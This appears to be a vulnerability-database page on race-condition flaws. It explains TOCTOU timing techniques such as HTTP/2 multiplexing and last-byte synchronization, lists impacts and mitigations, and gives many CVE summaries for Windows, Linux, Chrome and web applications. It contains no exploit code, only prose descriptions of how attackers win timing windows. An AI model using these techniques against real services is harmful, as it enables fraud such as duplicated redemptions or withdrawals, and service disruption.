Skip to main content

Race Condition

web MEDIUM

Race conditions occur when multiple concurrent requests exploit the brief time gap between checking a condition and acting upon it (TOCTOU - Time of Check, Time of Use).

How It Works

Race conditions occur when multiple concurrent requests exploit the brief time gap between checking a condition and acting upon it (TOCTOU - Time of Check, Time of Use). An attacker sends nearly simultaneous requests to manipulate shared state before the application can enforce its business logic. For example, when redeeming a gift voucher, Request A checks the balance, Request B also checks while A is processing, then both complete successfully—redeeming the voucher twice.

Attackers use specialized techniques to achieve precise timing. HTTP/2's multiplexing allows 20-30 requests in a single TCP packet, arriving virtually simultaneously at the server. For HTTP/1.1, "last-byte synchronization" holds back the final byte of multiple requests, then releases them together. These methods reduce network jitter to microseconds, maximizing collision probability.

Advanced attacks include multi-endpoint collisions (hitting different API paths that share state), exploiting partial object construction (accessing resources before initialization completes), and single-endpoint confusion (causing a function to process stale state by overwhelming it with requests).

Impact

  • Financial fraud: Redeeming coupons multiple times, withdrawing beyond account balance, applying discounts repeatedly
  • Authentication bypass: Reusing CAPTCHA tokens, bypassing rate limits on login attempts, exploiting session validation gaps
  • Resource exhaustion: Claiming limited inventory multiple times, booking the same seat/room concurrently
  • Data corruption: Simultaneous writes creating inconsistent database states, inventory counts becoming negative
  • Access control violations: Exploiting privilege checks to access unauthorized resources during state transitions

Real-World Examples

In 2019, security researchers demonstrated race conditions in major e-commerce platforms allowing users to purchase items at massive discounts by applying the same promotional code dozens of times within milliseconds. The applications checked voucher validity but didn't atomically mark them as used.

TOCTOU vulnerabilities have been found in cryptocurrency exchanges where concurrent withdrawal requests could drain more funds than an account held. Attackers automated HTTP/2 packet timing to submit multiple withdrawal requests before the balance update propagated, essentially duplicating money.

File upload race conditions have enabled remote code execution when attackers upload malicious files and execute them before security scanners complete validation-the check happens, but the file runs before removal.

Mitigation

  • Database transactions with row-level locking: Wrap check-and-update logic in ACID transactions with SELECT FOR UPDATE
  • Idempotency keys: Require unique request identifiers; reject duplicates within a time window
  • Uniqueness constraints: Database-level UNIQUE constraints on critical fields (voucher redemptions, order IDs)
  • Atomic operations: Use database built-ins like DECREMENT with bounds checking, compare-and-swap primitives
  • Application-level mutexes: Distributed locks (Redis, memcached) around critical sections, ensuring single execution
  • Rate limiting per resource: Throttle requests per user AND per target resource (not just per IP)
  • Sequence validation: Check monotonically increasing counters or nonces to detect concurrent modification

Recent CVEs (1813)

EPSS 0% CVSS 7.8
HIGH PATCH Act Now

Local privilege escalation in Microsoft Windows Push Notifications service stems from a race condition (CWE-362) that an attacker with low-privileged local access can exploit to gain higher privileges. No public exploit identified at time of analysis, and the issue is not on CISA KEV, but the CVSS 7.8 rating reflects high impact across confidentiality, integrity, and availability once the race is won. A vendor patch is available via the Microsoft Security Response Center advisory.

Information Disclosure Microsoft Race Condition
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Act Now

Local privilege escalation in Microsoft Windows Push Notifications service stems from a race condition (CWE-362) in concurrent handling of shared resources, allowing an authorized low-privileged attacker to win a timing window and elevate to higher privileges with scope change. The CVSS 3.1 vector AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H reflects local-only exploitation with high attack complexity due to the timing-dependent nature, but a successful attacker gains full confidentiality, integrity, and availability impact across a security boundary. No public exploit identified at time of analysis.

Information Disclosure Microsoft Race Condition
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Act Now

Local privilege escalation in Windows Push Notifications enables an authenticated low-privileged user to elevate to higher privileges by exploiting a race condition (CWE-362) in concurrent access to a shared resource. Successful exploitation results in high impact to confidentiality, integrity, and availability with scope change, but no public exploit identified at time of analysis. Microsoft has released a patch via MSRC advisory.

Information Disclosure Microsoft Race Condition
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote code execution in Microsoft Remote Desktop Client is possible when a user connects to an attacker-controlled RDP server, where a heap-based buffer overflow triggered by a race condition (CWE-362) allows arbitrary code execution on the client machine. The flaw carries a CVSS 7.5 (High) rating with high attack complexity and required user interaction, and no public exploit identified at time of analysis. Microsoft has released a patch via MSRC advisory CVE-2026-42913.

Race Condition Buffer Overflow Remote Desktop Client +6
NVD VulDB
EPSS 0% CVSS 7.0
HIGH PATCH Exploit Unlikely This Week

Local privilege escalation in Microsoft Windows Telephony Service allows an authenticated low-privileged attacker to elevate to higher privileges by exploiting a race condition in concurrent access to a shared resource. The flaw carries a CVSS 7.0 (High) rating with high attack complexity, and no public exploit identified at time of analysis. Successful exploitation grants full confidentiality, integrity, and availability impact on the affected host.

Information Disclosure Microsoft Race Condition
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote code execution in Microsoft Remote Desktop Client is possible when a user connects to an attacker-controlled or compromised RDP endpoint, where a race condition (CWE-362) can be triggered to corrupt heap memory and execute arbitrary code in the client process. The flaw is unauthenticated from the network attacker's perspective but requires user interaction to initiate the connection, and no public exploit has been identified at time of analysis.

Race Condition Buffer Overflow Remote Desktop Client +14
NVD VulDB
EPSS 0% CVSS 7.0
HIGH PATCH Exploit Unlikely This Week

Local privilege escalation in the Windows Function Discovery Service (fdwsd.dll) allows an authorized low-privileged attacker on the host to win a race condition and obtain elevated privileges. Reported by Microsoft (secure@microsoft.com) and tracked under MSRC's update guide, the issue carries a CVSS 7.0 score driven by high impact across confidentiality, integrity, and availability, though the high attack complexity reflects the timing window required. No public exploit identified at time of analysis and the flaw is not currently listed in CISA KEV.

Information Disclosure Race Condition
NVD VulDB
EPSS 0% CVSS 7.9
HIGH PATCH This Week

Unsynchronized traversal of HVM I/O port translation linked lists in the Xen hypervisor on x86 systems exposes a race condition exploitable by a compromised or malicious device model. The hypervisor manages I/O port translations via a linked list modified by the device model through XEN_DOMCTL_ioport_mapping; because traversal of that list during I/O port handling was never synchronized against concurrent modifications, a racing update can corrupt traversal state. The resulting hypervisor crash causes a Denial of Service of the entire host, with privilege escalation and information leakage explicitly acknowledged as non-ruled-out consequences - all without any active CISA KEV listing or public exploit identified at time of analysis.

Information Disclosure Race Condition
NVD VulDB
EPSS 0% CVSS 9.1
CRITICAL POC Exploit Unlikely Act Now

Cross-exception-level write access in multiple Arm CPU cores including Cortex-A76 through Cortex-X925, Neoverse N1/N2/V1/V2/V3/V3AE, and C1-Ultra/Premium designs allows a lower-privileged context to modify resources owned by a higher exception level due to a race condition (CWE-362). Tracked also as Xen XSA-493 and EUVD-2025-210084, the issue carries a CVSS of 9.1 reflecting high confidentiality and integrity impact, though there is no public exploit identified at time of analysis and the EPSS score of 0.02% (4th percentile) indicates very low predicted exploitation probability.

Information Disclosure Race Condition C1 Ultra +19
NVD VulDB
EPSS 0% CVSS 8.3
HIGH PATCH This Week

Sandbox escape in Google Chrome on macOS versions prior to 149.0.7827.103 allows a remote attacker who has already compromised the renderer/network process to break out of the browser sandbox via a race condition triggered by a crafted HTML page. Chromium rates the severity as High and a vendor patch is available, though no public exploit has been identified at time of analysis.

Information Disclosure Google Race Condition +2
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Deadlock vulnerability in the Linux kernel's pseries/papr-hvpipe subsystem allows a local low-privileged attacker on IBM pSeries Power Architecture systems to cause a kernel deadlock by triggering a race between the ioctl or release handler and a hardware interrupt firing on the same CPU. Exploitation is architecture-specific, requiring IBM PAPR hardware with the hvpipe driver loaded, and results in an availability-only denial-of-service. No public exploit exists and EPSS probability stands at 0.02%, consistent with a narrow attack surface; vendor-released patches are confirmed available for Linux 7.0.7, 7.1-rc3, and the 6.18 stable branch.

Linux Race Condition Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Use-After-Free and race conditions in the Linux kernel's Bluetooth hci_uart driver (drivers/bluetooth/hci_uart.c) enable a local low-privileged user to corrupt kernel heap memory, potentially escalating to root. The flaw stems from improper lifecycle management of the hci_uart struct and its associated workqueues: when a TTY hangup interrupts Bluetooth UART initialization before HCI_UART_PROTO_READY is set, teardown skips workqueue cancellation, leaving deferred work items to dereference freed memory. Three compounding sub-issues - a tx_skb double-free, a vendor callback UAF via premature hci_free_dev(), and proto_lock races during error paths - are all resolved in patched stable releases. No public exploit is known and EPSS at 0.02% (7th percentile) signals low near-term exploitation probability despite the CVSS 7.8 rating.

Linux Denial Of Service Race Condition
NVD VulDB
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

OAuth authorization code exchange in NocoDB versions up to 2026.05.0 is vulnerable to a race condition that breaks the single-use guarantee enforced by PKCE. By submitting two or more concurrent token-exchange requests before the server atomically marks the authorization code as consumed, an attacker who controls a malicious OAuth client can obtain multiple valid (access_token, refresh_token) pairs from a single authorization code, resulting in unauthorized long-lived session access alongside the legitimate token. Fixed in 2026.05.1 via an atomic compare-and-swap database operation; no public exploit has been identified at time of analysis and this vulnerability is not listed in the CISA KEV catalog.

Information Disclosure Microsoft Race Condition
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Cross-origin data leakage in Google Chrome's Permissions subsystem (prior to 149.0.7827.53) enables remote unauthenticated attackers to read data across origin boundaries via a crafted HTML page. The flaw, classified as a race condition (CWE-362) in the Permissions implementation, undermines the browser's Same-Origin Policy enforcement - a foundational web isolation mechanism. No public exploit identified at time of analysis; a vendor-released patch is available in version 149.0.7827.53, and Google has rated this Low severity in Chromium security terms.

Information Disclosure Google Race Condition +3
NVD
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Cross-origin data leakage in Google Chrome for Android (versions prior to 149.0.7827.53) is enabled by a race condition in the Geolocation subsystem, exploitable by a remote unauthenticated attacker who tricks a victim into visiting a crafted HTML page. The CVSS vector (AV:N/AC:L/PR:N/UI:R) confirms network reachability with no required privileges, though user interaction is mandatory. No active exploitation has been confirmed (not in CISA KEV), and EPSS sits at 0.03% (10th percentile), indicating very low real-world exploitation probability despite the High confidentiality impact rating.

Information Disclosure Google Race Condition +1
NVD VulDB
EPSS 0% CVSS 8.3
HIGH PATCH This Week

Sandbox escape in Google Chrome on Windows prior to 149.0.7827.53 enables a remote attacker who has already compromised the renderer process to break out of the browser sandbox via a crafted HTML page that triggers a race condition in the Codecs component. Chromium rates this High severity, and while no public exploit was identified at time of analysis, the bug fits the classic renderer-to-sandbox-escape pattern frequently chained in real-world Chrome exploit kits. CVSS is 8.3 reflecting high attack complexity, required user interaction, and a scope change.

Information Disclosure Google Microsoft +2
NVD VulDB
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

DNS transaction ID entropy collapse in AdGuard Home (≤v0.107.74) and its underlying dnsproxy library (≤v0.81.2) reduces the backend UDP forwarding tuple from two random variables to one: the DNS ID is deterministically 0 on every client-triggered DoQ-to-UDP hop, leaving only the UDP source port as the sole remaining entropy variable. An off-path attacker who can inject spoofed ICMP error messages toward the resolver's egress address can exploit a reliable source-port oracle - confirmed across four consecutive runs for both products - to identify the correct backend socket state before injecting a forged DNS response, placing this attack in the same threat-model class as SAD DNS and TUdoor. No public exploit confirmed at time of analysis beyond the working oracle reproducer included in the advisory disclosure; the advisory is not listed in CISA KEV.

OpenSSL Race Condition Oracle +2
NVD GitHub
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Race condition in the Linux kernel's CoreSight TMC-ETR (Trace Memory Controller, Embedded Trace Router) driver triggers a kernel WARN_ON() when sysfs and perf hardware tracing modes are enabled concurrently, resulting in a denial-of-service condition against the tracing subsystem. The sysfs enable path is split across two separate spinlock-protected critical sections, creating a window where perf mode can initialize drvdata->etr_buf between the sysfs buffer allocation and hardware enablement steps - causing tmc_etr_enable_hw() to encounter an already-initialized pointer and fire WARN_ON(). No public exploit exists and EPSS is 0.02% (4th percentile), indicating near-zero real-world exploitation probability; patched kernel versions 6.18.14, 6.19.4, and 7.0 are available.

Information Disclosure Race Condition Linux +2
NVD VulDB
EPSS 0% CVSS 1.3
LOW POC PATCH Monitor

Race condition in Open5GS AMF up to version 2.7.6 allows a remote, low-privileged attacker to trigger concurrent NGAP Security Mode Command processing in gmm_state_security_mode (src/amf/gmm-sm.c), resulting in low availability impact. Publicly available exploit code exists (N2-SMC-Concurrent.zip), though no public exploit identified at time of analysis indicates active exploitation and this CVE is not listed in CISA KEV. Notably, the associated fix PR (#4501) addresses a broader NGAP identity-scoping flaw - where the AMF accepted UE-associated NGAP messages from any gNB regardless of which gNB originally registered the UE - suggesting the underlying attack surface may exceed what the formal CVSS score of 3.1 captures.

Information Disclosure Race Condition Open5gs
NVD VulDB GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Cross-tenant data exposure in Extreme Platform ONE's IAM Gateway API-key authentication path allows an authenticated API-key holder to intermittently receive response data belonging to a different tenant under high-concurrency conditions. Affected endpoints include both ExtremeCloud IQ (XIQ/XAPI) and Extreme Platform ONE Common Services API paths; XIQ-native tokens and standard OAuth/Bearer JWT authentication are explicitly confirmed unaffected. No public exploit identified at time of analysis, and no CISA KEV listing exists, but the Changed scope (S:C) in the CVSS vector confirms that successful exploitation crosses tenant isolation boundaries, elevating the real-world severity beyond the 6.3 base score for multi-tenant deployments.

Information Disclosure Race Condition Extreme Platform One
NVD VulDB
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Discount over-redemption via race condition in Shopper (shopperlabs/shopper prior to v2.8.0) allows concurrent unauthenticated checkout requests to bypass a coupon's global usage_limit, resulting in committed orders carrying unauthorized discounts the merchant never intended to grant. The CreateOrderFromCartAction::execute method created the Order database row before atomically reserving the discount slot, opening a classic TOCTOU window that becomes reliably exploitable under the high-concurrency traffic of flash sales or Black Friday events. A compounding bug rendered usage_limit_per_user entirely non-functional in all pre-2.8.0 versions - the underlying counter was never incremented anywhere in the codebase - meaning per-user caps provided zero protection regardless of a customer's redemption history. No public exploit identified at time of analysis; this CVE is not listed in CISA KEV.

Information Disclosure Race Condition Shopper
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote denial of service in Gotenberg v8.10.0 through v8.32.0 allows unauthenticated attackers to crash the process by sending a single multipart request with multiple downloadFrom entries that trigger concurrent writes to unsynchronized Go maps. Because the default deployment enables downloadFrom and disables authentication, any internet-exposed instance can be terminated remotely without credentials, and publicly available exploit code exists in the upstream GitHub Security Advisory GHSA-vp73-vjw8-8f32. No public exploit identified in CISA KEV at time of analysis, but the PoC is fully reproducible and the fix is shipped in v8.33.0.

Race Condition Denial Of Service
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote code execution in Google Chrome versions prior to 148.0.7778.216 allows remote attackers to execute arbitrary code within the renderer sandbox by enticing a victim to visit a crafted HTML page that triggers a race condition in the WebAudio component. Google rates the underlying Chromium issue as High severity, and while no public exploit identified at time of analysis, the bug is browser-resident and reachable from any web origin, making it a meaningful drive-by risk once details surface. EPSS data was not provided, and the issue is not currently listed in CISA KEV.

Google RCE Race Condition +3
NVD VulDB
EPSS 0% CVSS 3.1
LOW PATCH Monitor

Cross-origin data leakage in Google Chrome's WebRTC component on Windows exposes limited confidential data to remote attackers via a race condition in all Chrome versions prior to 148.0.7778.216. An unauthenticated remote attacker (PR:N) can exploit this by luring a victim to a crafted HTML page, exploiting a timing window in WebRTC's concurrent execution to read cross-origin data. No public exploit has been identified at time of analysis and EPSS stands at 0.03% (9th percentile), indicating very low real-world exploitation pressure despite Chrome's internal 'High' severity classification.

Google Microsoft Information Disclosure +2
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Use-after-free in the Linux kernel's RSI (Redpine Signals) WiFi driver allows a local low-privileged attacker to crash the kernel by exploiting a race condition between kthread self-exit and external stop operations. When `kthread_complete_and_exit` races ahead of `kthread_stop`, the already-freed task struct is dereferenced, causing a kernel denial of service. No public exploit has been identified and EPSS sits at 0.02% (5th percentile), reflecting very low real-world exploitation probability; the vulnerability is not listed in CISA KEV.

Race Condition Linux Information Disclosure +2
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Local privilege escalation risk in the Linux kernel's ALSA PCM OSS emulation layer stems from an unprotected concurrent access to the runtime.oss.trigger bit field, allowing racing writes to corrupt adjacent bit fields and destabilize sound device state. The flaw affects Linux kernel versions prior to 6.12.88, 6.18.30, and 7.0.7, and was discovered through fuzzing; no public exploit identified at time of analysis, and EPSS scoring (0.02%) indicates negligible probability of opportunistic exploitation.

Linux Information Disclosure Race Condition
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Race condition in the Linux kernel's MPTCP (Multipath TCP) path manager subsystem affects the mptcp_pm_add_timer() ADD_ADDR retransmission helper, where the timer callback runs in softirq context without holding the socket lock via bh_lock_sock(). The data race could lead to inconsistent socket state when concurrent operations touch the same MPTCP socket. Despite a CVSS of 9.8, EPSS is only 0.02% (5th percentile) and no public exploit identified at time of analysis; the tag 'Information Disclosure' suggests realistic impact is far below the headline score.

Linux Information Disclosure Race Condition
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Race condition in the Linux kernel's NVMe/TCP target (nvmet-tcp) subsystem allows a remote NVMe/TCP host to trigger a double kref_put() on a queue object by sending an Initialization Connection Request (ICReq) and immediately closing the connection. The flaw, fixed in stable releases 6.12.88, 6.18.30, and 7.0.7 (mainline 7.1-rc2), stems from nvmet_tcp_handle_icreq() updating queue->state without serializing against concurrent target-side queue teardown, defeating the DISCONNECTING-state guard and enabling a use-after-free condition. No public exploit identified at time of analysis and EPSS is very low (0.02%), indicating limited real-world exploitation interest despite the headline 9.8 CVSS.

Linux Information Disclosure Race Condition
NVD VulDB
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Thread-safety flaws in pam_usb's deny_remote feature allow incorrect remote-session authentication decisions in display managers like GDM that run concurrent authentication threads. Three functions use the non-reentrant strtok(), whose single global state pointer can be overwritten mid-parse by a racing thread, corrupting tmux session data or /proc environ analysis used to classify sessions as local or remote. Compounding this, strtok() is called directly on the raw pointer returned by getenv(TMUX), inserting NUL bytes directly into the live process environment block and permanently corrupting the TMUX variable for all subsequent authentications in that long-lived process. An attacker with local low-privileged access on an affected system running GDM could exploit thread interleaving to cause deny_remote=true to pass a remote session as local. No public exploit identified at time of analysis; CVSS 6.3 with local, high-complexity attack vector.

Information Disclosure Race Condition
NVD GitHub
EPSS 0% CVSS 5.7
MEDIUM PATCH This Month

Concurrent PAM invocations in pam_usb prior to 0.9.1 expose a process-wide static pointer race condition in src/log.c, where each PAM call overwrites a shared static pointer with the address of a stack-local variable. When multiple threads invoke the PAM stack simultaneously - a normal condition in multi-threaded Linux services such as SSH daemons or display managers - one thread's logging pointer can reference another thread's already-deallocated stack frame, causing availability loss (crash/hang) or limited integrity corruption. No public exploit has been identified at time of analysis, and this is not listed in CISA KEV.

Race Condition Information Disclosure Pam Usb
NVD GitHub
EPSS 0% CVSS 4.4
MEDIUM This Month

Security bypass via race condition in IBM WebSphere Application Server Liberty 22.0.0.11 through 26.0.0.5 allows a remote, highly-privileged attacker to circumvent access controls during a narrow timing window, resulting in high-confidentiality-impact data exposure. The CVSS vector confirms network-based exploitation requiring high privileges and high attack complexity, constraining real-world risk significantly. No public exploit code and no CISA KEV listing have been identified at time of analysis.

Authentication Bypass IBM Race Condition
NVD
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Use-after-free in the Linux kernel's amphion VPU media driver allows local privileged users to trigger a kernel panic and potential memory corruption due to a race condition between v4l2_m2m_ctx_release() and v4l2_m2m_try_run(). The flaw affects systems using the amphion video encode/decode driver (introduced in 5.18) and has been resolved upstream by removing reliance on the m2m framework's job scheduling. No public exploit identified at time of analysis and EPSS is very low (0.02%), but the local high-impact CVSS of 7.8 makes it relevant for multi-tenant or hardened kernel deployments.

Linux Denial Of Service Race Condition
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Deadlock and memory leak in the Linux kernel DAMON subsystem arise from a race condition between damon_call() request registration and kdamond_fn() thread exit, affecting systems using the Data Access MONitor (DAMON) API. A local low-privileged process can trigger the race at precisely the moment a kdamond thread is terminating - causing the calling thread to wait indefinitely for a handler that has already exited, resulting in a kernel-level availability denial. No active exploitation is confirmed (EPSS 0.02%, not in CISA KEV), and the high attack complexity required to win the race significantly constrains real-world risk.

Race Condition Linux Information Disclosure +2
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Race condition in the Linux kernel memory management subsystem during large-folio migration can cause kernel availability disruption on SMP/NUMA systems. The flaw in migrate_folio_move() causes a destination folio to become visible to concurrent rmap-removal paths before being requeued onto the deferred split queue, triggering a kernel WARN in deferred_split_folio() or silently losing a folio from split_queue when the shrinker races the migration lock. With no public exploit, no CISA KEV listing, and an EPSS of 0.02%, this is a low real-world risk issue primarily relevant to HPC, virtualization, and database workloads with heavy NUMA migration activity.

Nvidia Race Condition Linux +3
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Deadlock in Linux kernel DAMON (Data Access Monitor) subsystem allows a local low-privileged user or kernel code path to cause an indefinite thread hang in the mm/damon/core module via a race condition between damos_walk() request registration and kdamond_fn() exit sequencing. Systems running Linux kernels from commit bf0eaba0ff9c9c8e6fd58ddfa1a8b6df4b813f61 through the patch commits are affected, with availability as the sole impact (CVSS C:N/I:N/A:H). No public exploit identified at time of analysis, and EPSS probability is 0.02% (5th percentile), indicating negligible real-world exploitation interest.

Race Condition Linux Information Disclosure +2
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM This Month

Use-after-free race condition in the Linux kernel hwrng (hardware random number generator) core subsystem allows a local attacker with low privileges to crash the kernel, causing a denial of service. The race occurs when hwrng_register() and hwrng_unregister() execute concurrently, leaving the hwrng_fill pointer dirty and enabling kthread_stop() to be invoked on an already-freed task_struct - confirmed in the virtrng_remove call path, making virtualized Linux environments a primary real-world attack surface. No public exploit code exists and no active exploitation (KEV) has been confirmed; the EPSS score of 0.02% reflects minimal opportunistic exploitation activity.

Race Condition Linux Information Disclosure +2
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Race condition in the Linux kernel's Intel VT-d IOMMU driver allows a local low-privileged attacker to trigger inconsistent PASID table state during domain replacement, potentially producing spurious IOMMU faults and unpredictable DMA behavior with cross-scope impact. The flaw stems from non-atomic updates to 512-bit PASID entries while the Present bit is set, and no public exploit identified at time of analysis despite a high CVSS score driven by the scope-changed local attack surface.

Linux Information Disclosure Intel +1
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Filesystem data integrity issue in the Linux kernel ext4 module allows local low-privileged users to trigger bitmap inconsistencies through a race condition between page migration and ext4 buddy bitmap modification under mixed huge-page workloads. The flaw can produce false group descriptor mismatches and corruption of in-memory block allocation state, with high confidentiality, integrity, and availability impact per CVSS 7.8 (AV:L). No public exploit has been identified at time of analysis and EPSS is very low at 0.02%.

Linux Information Disclosure Race Condition
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Use-after-free condition in the Linux kernel's RDMA Soft RoCE (rxe) driver allows local privileged users to trigger memory corruption through a race between the QP retransmit_timer handler and rxe_destroy_qp. The flaw stems from the Queue Pair reference count dropping to zero while a timer callback is still executing, producing refcount underflow warnings and potential kernel memory corruption. No public exploit identified at time of analysis, and EPSS exploitation probability is very low at 0.02%.

Linux Information Disclosure Race Condition
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Race condition in the Linux kernel's XFRM ICMP route lookup path causes a kernel WARN_ON that can crash affected systems. Within `icmp_route_lookup()`, a TOCTOU window between a locality check and a subsequent `ip_route_input()` call allows a concurrently executing `ip addr add` to return a LOCAL route whose `dst.output` is set to `ip_rt_bug()` - a debugging stub that fires `WARN_ON` when invoked during ICMP error transmission. Exploitation requires local access, active XFRM/IPsec policy, and precise race-window timing; no active exploitation is confirmed and EPSS sits at 0.02%, though a public reproducer exists that requires kernel modification to reliably trigger.

Linux Race Condition Information Disclosure +2
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Race condition in the Linux kernel's accel/amdxdna driver allows a local low-privileged user to cause device availability impact on systems equipped with AMD XDna AI accelerator hardware. The flaw in the rpm_on flag check permits command submissions to the accelerator during a narrow autosuspend transition window before the device has fully resumed, producing undefined hardware behavior or driver crashes. No public exploit exists and EPSS is at the 6th percentile (0.02%), indicating negligible real-world exploitation probability; no active exploitation is confirmed.

Linux Race Condition Information Disclosure +2
NVD VulDB
EPSS 0% CVSS 7.0
HIGH PATCH This Week

Local privilege escalation in Apple macOS allows a malicious or compromised application to win a race condition (CWE-362) and elevate from a normal user context to root. The flaw affects macOS releases prior to Sequoia 15.7 and Tahoe 26, was reported by Apple itself, and is resolved by additional validation in the patched builds. No public exploit has been identified at time of analysis, and the CVSS 7.0 rating reflects high attack complexity tied to reliably hitting the timing window.

Race Condition Apple Information Disclosure
NVD
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Lumiverse's sign-up nonce mechanism prior to version 0.9.7 allows unauthenticated remote attackers to register unauthorized accounts by exploiting a race condition in the `consumeNonce()` function. When an admin's user-creation request fails due to a duplicate email - causing BetterAuth to reject at the validation layer - the nonce is set but never consumed, leaving a 10-second window during which any POST to `/api/auth/sign-up/email` will succeed regardless of the sender. No public exploit code exists and no CISA KEV listing is present; exploitation requires precise timing and the ability to observe or predict an admin's failed duplicate-email attempt, consistent with the CVSS AC:H rating.

Race Condition Authentication Bypass Lumiverse
NVD GitHub
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Race condition exploitation in NVIDIA Display Driver's Linux kernel module allows a local authenticated user to cause denial of service by manipulating compiler or processor memory instruction ordering. Affected product lines span GeForce, RTX/Quadro/NVS, Tesla, and vGPU Guest Driver across multiple driver branches up to the March 2026 release. No active exploitation has been confirmed - this is not listed in CISA KEV, EPSS is 0.01% (1st percentile), and SSVC assessment classifies exploitation status as none - placing this firmly in a patch-and-monitor category rather than emergency response.

Denial Of Service Nvidia Race Condition +6
NVD VulDB
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Denial of service in Algernon web server versions prior to 1.17.6 stems from a race condition in the Lua handler engine where the sync.RWMutex protecting LoadCommonFunctions is released before L.Push() and L.PCall() execute on the non-goroutine-safe gopher-lua LState. Concurrent HTTP requests corrupt the shared Lua VM state, causing server instability. No public exploit identified at time of analysis, and EPSS is very low (0.04%), but reproduction is trivial under modest load (ab -n 1000 -c 100).

Information Disclosure Race Condition Algernon
NVD GitHub
EPSS 0% CVSS 4.1
MEDIUM PATCH This Month

File descriptor hijacking in ImageMagick's distributed pixel cache server (magick -distribute-cache) exposes sensitive data via a race condition exploitable by a privileged local attacker. Affected are all Magick.NET NuGet packages across Q16, Q16-HDRI, OpenMP, and ARM64 variants prior to version 14.12.0. Successful exploitation yields high-confidentiality impact - an attacker can read file descriptors belonging to the server process - though no public exploit code exists and this is not currently listed in the CISA KEV catalog.

Information Disclosure Race Condition Red Hat +1
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Server crash via race condition in Mattermost's persistent notification and channel archival subsystem allows any low-privileged authenticated user to bring down the server with no user interaction required. Affected branches span 10.11.x through 11.6.x across multiple maintenance lines. No public exploit code has been identified at time of analysis and the vulnerability is absent from CISA KEV, but the low authentication bar combined with network accessibility and low attack complexity makes this a credible insider threat or targeted denial-of-service vector against any exposed Mattermost deployment.

Denial Of Service Race Condition Mattermost
NVD
EPSS 0% CVSS 8.1
HIGH POC PATCH This Week

Use-after-free in Ruby 4.x (before 4.0.5) lets remote attackers who can manipulate DNS response timing crash applications calling Addrinfo.getaddrinfo with a timeout: option or Socket.tcp with resolv_timeout:. The flaw lives in the pthread-based getaddrinfo timeout handler (rb_getaddrinfo in ext/socket/raddrinfo.c) and, while reliably exploitable for denial of service, also raises a theoretical possibility of memory-corruption-based code execution. No public exploit identified at time of analysis.

Denial Of Service Race Condition Ruby
NVD VulDB GitHub
EPSS 0% CVSS 4.5
MEDIUM PATCH This Month

Race condition in Netatalk's privilege toggle mechanism exposes AFP file server hosts to local privilege abuse across versions 2.2.5 through 4.4.2. The non-reentrant privilege toggle function can be exploited by a low-privileged local user who wins a narrow timing window to read, modify, or disrupt data at a transiently elevated privilege level. No public exploit code exists and the issue is not listed in CISA KEV; real-world risk is constrained by the requirement for local access and high attack complexity. Vendor-released patch is available in version 4.5.0.

Information Disclosure Race Condition Suse
NVD VulDB
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Denial of service in ISC BIND 9 resolvers can be triggered when a SIG(0)-signed DNS message is dropped under recursive-clients pressure, creating a race that leads to a use-after-free on the discarded message buffer. Affects BIND 9.20.0-9.20.22, 9.21.0-9.21.21, and the 9.20.9-S1-9.20.22-S1 subscription branch; no public exploit identified at time of analysis and the issue is not on CISA KEV.

Information Disclosure Race Condition Bind 9
NVD VulDB
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Full process crash in Mailpit before v1.30.0 is achievable by a remote unauthenticated attacker via a race condition in the /proxy endpoint's CSS rewriter cache, causing Go's unrecoverable fatal runtime panic and terminating the SMTP, POP3, and HTTP listeners simultaneously. The root cause is an unsynchronized read of a package-level assets map[string]MessageAssets cache that is written concurrently by a cleanup goroutine and re-entrant CSS-rewriting handlers - Go's runtime detects the collision and calls throw(), which bypasses http.Server's handler-panic recovery. Publicly available exploit code exists in the GHSA advisory; no CISA KEV listing has been identified at time of analysis, and EPSS data was not available in the provided intelligence.

Denial Of Service Race Condition
NVD GitHub
EPSS 0% CVSS 7.7
HIGH This Week

